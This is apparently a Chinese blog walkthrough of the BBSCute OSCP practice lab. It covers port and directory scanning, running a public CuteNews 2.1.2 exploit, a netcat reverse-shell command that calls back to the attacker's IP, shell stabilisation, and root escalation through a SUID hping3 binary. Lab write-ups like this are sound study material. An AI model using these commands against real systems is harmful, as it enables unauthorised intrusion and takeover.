OSCP BBSCute 详细教学

最新推荐文章于 2024-06-22 09:37:22 发布
最新推荐文章于 2024-06-22 09:37:22 发布
阅读量256 收藏
点赞数
分类专栏: OSCP 文章标签: php 开发语言 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52545432/article/details/130562003
版权

BBSCute
ip 192.168.51.128
后面ip变了是因为又开了一次靶机

打点

开扫
在这里插入图片描述

88 http
110 pop3
995 ssl/pop3
开始目录扫描,东西好多,醉了
在这里插入图片描述

找到一个登录框(并不是一开始就找到这个的,翻了挺久),还点了注册,发现注册不了,因为根本就没有验证码
发现框架是CuteNews 2.1.2 ,去网上找有没有公开的exp。
在这里插入图片描述

有一个是python脚本,直接拿过来试试。
直接复制这个exp,在kali桌面新建一个.py的文件。我这里叫1.py,然后直接用命令行运行
在这里插入图片描述

报错了,去看看问题在哪
在这里插入图片描述

会发现这里的url是CuteNews/cadaes啥啥的,但是我们去网站会发现目录是index.php啥的,说明这个网站的默认路径应该是有CuteNews的,但是这个靶机把它给改掉了,所以说这个exp需要修改一下,就是把有这个CuteNews的地方都删掉。一共是5个地方。
如果觉得用百度看起来不高级的话,也可以用kali自带的exp
searchsploit cutenews
在这里插入图片描述

cd /usr/share/exploitdb/exploits/php/webapps/
这个是文档的路径,可以记一下的
然后把他复制到桌面就可以了
在这里插入图片描述

直接命令行
python 1.py
输入url不用加目录 http://192.168.52.128
在这里插入图片描述

直接就有了一个低权限的shell,为了防止掉,我们先把shell弹到kali上
shell:nc -e /bin/bash 192.168.49.52 6666 这里的ip填的是kali的IP
这条命令的意思是:通过Netcat,尝试与 IP 地址为 192.168.49.52,端口号为 6666 的服务器进行连接,并在连接成功后,执行 /bin/bash 程序。这实际上是在创建一个反向Shell连接,这种连接允许远程主机访问和控制执行该命令的设备的 Shell。
kali: nc -nlvp 6666
使用 Netcat 工具以监听模式启动,监听端口号 6666
在这里插入图片描述

发现前面啥都没有,说明还是不够稳定,用python创建一个稳定的shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
在这里插入图片描述在这里插入图片描述

提权

接下来开始提权
输入命令find / -type f -user root -perm -4000 2>/dev/null
在这里插入图片描述

意思是:从根目录开始查找所有属于root用户且设置了SUID属性的普通文件
在这里插入图片描述

找到了这些文件,其中这个hping3,比较陌生,把他拎出来放在一个查提权命令的网站,你也可以每个都试试。
https://gtfobins.github.io/ 打靶必备
在这里插入图片描述

输入hping3就直接是root了。妙
在这里插入图片描述
完结撒花!!!

YueHat
关注
专栏目录
VulnHub靶场之BBS (cute): 1.0.1
A_dmin的博客
10-04 915
VulnHub靶场之BBS (cute): 1.0.1 扫描IP以及端口: 先不管其他东西,直接访问80,web页面: 目录扫描: 访问index.php: 发现使用的是CuteNews 2.1.2,搜索一下相关漏洞,三个利用方式: 看了一下,第一个要手动加载啥的,也就是说msf中没有加载的,,,, 第三个是文件上传,但是验证码好像有问题,没尝试,,直接使用大佬的exploit了,,, 运行得到简单shell: 开启python简单http服务: 上传shell.php文件: 运行shell
oscp
03-26
oscp
推荐一个渗透测试学习宝藏——“OSCP”项目
最新发布
gitblog_00059的博客
06-22 384
???? 推荐一个渗透测试学习宝藏——“OSCP”项目 项目地址:https://gitcode.com/LeonardoE95/OSCP 在网络安全的领域中,掌握渗透测试技能无疑是对付网络威胁的一把利剑。而要成为一名合格的渗透测试工程师,“Offensive Security Certified Professional(OSCP)认证”几乎是所有安全专业人员梦寐以求的目标。今天,我要向大家推荐的就是...
OSCP靶场系列-Esay-BBSCute保姆级
杳若的博客
07-23 6151
BBSCute保姆级靶场流程
PG::BBSCute
aya3t的博客
12-16 98
PROVING GROUNDS::BBSCute
VULNHUB之BBS (cute): 1.0.1
鲨鱼辣椒的博客
07-25 428
好久没写文章了,开始是学期末比较忙,后来放假了说实话有点懈怠也比较迷茫。感觉自己要学的东西很多却又不知道该从哪里下手。写文章就暂时放下了,最近整理了一下自己,文章还是要写,仅作为自己慢慢成长路上的一个记录也好。好了,不多说开始今天的练习 信息搜集 扫描网段发现目标主机IP地址 扫描IP地址发现开启的服务以及端口 发现开启的服务寻找漏洞 SSH 看见ssh第一反应就是暴力破解但是也不能盲目,后面有http可以在web页面上看是否能搜集到一些账号相关的敏感信息可以大大加强我们成功爆破的概率(
【OSCP
weixin_44126257的博客
10-02 355
基础知识
OSCP认证学习资源汇总.zip
08-19
0x0001-OSCP学习资料PWK v1.15-带书签 0x0002-OSCE学习资料-CPTV 1.0 0x0003-OSCP考试命令大全 0x0004-INE机构OSCP课程 0x0005-bof真题文件 0x0006-缓冲区溢出题目全套解决方案 0x0007-OSCP报告模板参考 0x0008-题型...
OSCP:OSCP考试材料
05-01
【标题】"OSCP: OSCP考试材料"指的是Offensive Security Certified Professional的备考资源,这是一个高级的渗透测试认证,旨在证明个人在网络安全攻击与防御方面的技能。OSCP认证由Offensive Security公司颁发,...
OSCP网络安全认证
10-19
2. **报告编写**:完成渗透测试后,考生需要撰写详细的渗透测试报告,报告应包含所有发现、步骤和证据。 3. **代码审查**:部分题目可能需要考生编写或修改代码以完成特定任务。 ### OSCP认证备考策略 - **实践...
OSCP-PWK:https
04-27
OSCP 提供了更好的阅读体验,因为回购协议大多类似于草稿和备份。 注释和备忘单位于Wiki页面中。 回购中充斥着TryHackMe编写的内容和二进制文件。 卡利配置 ohmyzsh + powerlevel10K + tmux Kali 2020.3的提示:...
OSCP之旅
03-04
OSCP之旅
OSCP-BoF:这是有关了解#OSCP考试中存在的#BoF机器的演练
05-04
触发BoF(这对OSCP有利,因为它们为您提供了代码段) 查找EIP偏移 确认偏移 找到坏蛋 确认错误字符+查找JMP ESP指令 确认代码执行(pop calc) 利用主机 它基于“”项目(顺便说一句,对此进行了令人敬畏的解释)...
OSCP Seppuku
m0_52545432的博客
05-12 148
● /usr/bin/ln -sf /root/ /tmp/ - 这是一个用于为 /root/ 目录创建符号链接的命令,链接将位于 /tmp/ 目录中。还有一个passwd打开是一个密码的字典,猜测可能是等下爆破要用这个字典,先把目录切换到桌面,再利用wget命令把这个passwd.lst保存到桌面。成功登录后,发现根本就没有这个文件,所以我们选择自己去创建这个目录,以及写一个bin文件,内容为/bin/bash。两个页面是一样的,还有一个页面打不开,试试目录扫描,对这个7601端口的页面。
【Oscp练习】
weixin_44126257的博客
02-14 212
Oscp练习
oscp——DC-1
王嘟嘟的博客
02-04 885
0x00 前言 这个是第二十一台机子,现在准备复习两台旧的,做一台新的。加油。 0x01 信息收集 IP 端口信息 0x02 测试 提取->webshell 访问发现是一个Drupal的站,直接cve打一下 简单描述下就是使用CVE-2018-7600直接拿到shell 弹回来了一个shell 到home目录下拿到一个flag 在var目录下看到flag1 查一下suid fi...
OSCP分享
m0_73441912的博客
08-26 910
OSCP(国际进攻性安全专家认证)是一项实践型技术认证,内容包括渗透测试方法和 Kali Linux 中所包含工具的使用方法。它要求持有者在安全的实验室环境中成功攻击和渗透各种实验机器。 相比其他道德黑客认证,OSCP更具有技术性。在国内外的渗透领域,都有极高的认可度,含金量极高。 对 TCP/IP 网络有扎实的理解 熟练掌握 Windows 和 Linux 操作 熟练掌握 Bash 或者 Python 脚本编写 考试24小时,使用虚拟实验室环境,英文机考,考试全程监控,要自己准备网络环境,建议多准备几个,
oscp——DC-4
王嘟嘟的博客
02-07 358
0x00 前言 这个是第二十四台机子了,终于这台机子是自己独立完成的了。 0x01 信息收集 0x02 端口 首先访问一下目标站点 可以爆破,爆破拿到密码 happy 然后进行登录 找到一个命令执行 反弹一下shell 在/home/jim/backups目录下找到一个密码,试试ssh爆破 jim jibril04 然后ssh连接之后可以看到一份邮件,拿到Charles得到账号密...
oscp relia
12-21
OSCP(Offensive Security Certified Professional)是一种信息安全认证,它着重于渗透测试和攻击技术。OSCP认证考试涵盖了网络渗透测试、漏洞利用、社会工程学和渗透测试工具的使用等内容。持有OSCP认证的专业人员通常具有深厚的渗透测试技能和经验,能够有效地识别和利用系统和网络中存在的漏洞,进而提供相应的建议和解决方案,以提高组织的安全性防御水平。 OSCP认证对于从事信息安全领域的专业人士来说,具有非常高的含金量和认可度。通过攻克OSCP认证考试,不仅可以提升个人在行业内的知名度和竞争力,还能够为个人的职业发展带来更多的机会和挑战。因此,越来越多的安全从业者和企业选择通过学习和考取OSCP认证来提升自己在渗透测试领域的专业能力和地位。 总的来说,OSCP认证是一项具有挑战性和实用性的信息安全认证,它能够帮助从业者全面提升自己的技术水平和职业发展前景。持有OSCP认证的渗透测试专业人员不仅拥有丰富的实战经验,还能够为企业提供专业、高效的安全防御与风险管理服务。因此,OSCP认证在当前信息安全行业中拥有非常重要的地位和价值。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值